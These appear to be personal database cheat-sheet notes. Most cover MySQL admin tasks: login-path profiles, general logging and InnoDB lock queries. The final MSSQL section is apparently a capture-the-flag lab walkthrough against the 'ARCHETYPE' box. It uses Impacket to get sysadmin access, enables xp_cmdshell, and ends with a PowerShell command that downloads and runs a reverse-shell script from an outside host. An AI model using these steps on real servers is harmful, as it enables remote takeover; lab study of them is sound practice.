Run mysql with a profile

mysql --login-path=local1 -e "$SQL"

Config editor


# Adds a new connexion config
mysql_config_editor set --login-path=local1 --host=127.0.0.1 --user=ubuntu --password

# Print config
mysql_config_editor print --all

# Check the connexion
mysql --login-path=local1 -s

# Any connexions ?
sudo lsof -Pni :3306

Debug: MySQL

Activate the logging

# Open config file
sudo vim /etc/mysql/mysql.conf.d/mysqld.cnf

# Uncomment the 
# Both location gets rotated by the cronjob.
# Be aware that this log type is a performance killer.
# As of 5.1 you can enable the log at runtime!
general_log_file        = /var/log/mysql/mysql.log
general_log             = 1

# Restart MySQL
sudo service mysql restart

# Check the newly update logs
tail -f /var/log/mysql/mysql.log

Locks table

Show engine InnoDB status transactions

# Check about all the locks transactions
SELECT * FROM INNODB_LOCK_WAITS

# List of blocking transactions
SELECT * 
FROM INNODB_LOCKS 
WHERE LOCK_TRX_ID IN (SELECT BLOCKING_TRX_ID FROM INNODB_LOCK_WAITS)
OR
SELECT INNODB_LOCKS.* 
FROM INNODB_LOCKS
JOIN INNODB_LOCK_WAITS
ON (INNODB_LOCKS.LOCK_TRX_ID = INNODB_LOCK_WAITS.BLOCKING_TRX_ID)

# List of locks on particular table:
SELECT * FROM INNODB_LOCKS 
WHERE LOCK_TABLE = db_name.table_name

# List of transactions waiting for locks
SELECT TRX_ID, TRX_REQUESTED_LOCK_ID, TRX_MYSQL_THREAD_ID, TRX_QUERY
FROM INNODB_TRX
WHERE TRX_STATE = LOCK WAIT

Query from a list

SET @TMP_APP_ID := (select distinct(id) from `aaa`.`xxx` where name like "%whisky%");

DELETE FROM `aaa`.`pages` 
WHERE FIND_IN_SET(page_id, (
	SELECT ids_to_delete
		FROM (
			SELECT group_concat(id) AS ids_to_delete
			FROM `aaa`.`something`
			WHERE application_id=@TMP_APP_ID
			AND (title NOT like "%whatever%") 
			AND (
			    title NOT like "%Politique%" AND
	            title NOT like "%contact%"
	        )
		) t
	)
);

MSSQL

mssql-cli -S IP -U sa -P 'pass'

let’s try connecting to the SQL Server using Impacket’s mssqlclient.py.

┌──(kali㉿kali)-[§]
└─$ mssqlclient.py ARCHETYPE/[email protected] -windows-auth
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> SELECT IS_SRVROLEMEMBER('sysadmin');
              

-----------   

          1

Our current user has sysadmin permissions

SQL> EXEC sp_configure 'Show Advanced Options', 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure;
SQL> sp_configure;

xp_cmdshell                                     0             1              1             1   

SQL> EXEC sp_configure 'xp_cmdshell', 1
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure;

We can run command directly in mssql

SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.12:8000/reverse_shell_window.ps1\");"